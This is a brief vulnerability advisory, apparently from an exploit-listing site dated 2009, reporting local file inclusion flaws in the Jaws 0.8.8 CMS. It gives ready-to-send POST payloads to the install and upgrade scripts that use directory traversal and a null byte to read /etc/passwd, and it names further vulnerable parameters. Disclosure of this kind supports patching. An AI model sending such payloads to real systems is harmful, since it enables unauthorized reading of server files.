Jaws 0.8.8 Multiple Local File Inclusion Vulnerabilities

2009-02-04 09:41:41

Jaws 0.8.8 Local File Inclusion

POST /upgrade/index.php
language=../../../../../../../../../../../../etc/passwd%00

POST /install/index.php
language=../../../../../../../../../../../../etc/passwd%00
Also vulnerable:
Introduction_complete
use_log

Author notified: Jan 24

#

Fixes

No fixes

In order to submit a new fix you need to be registered.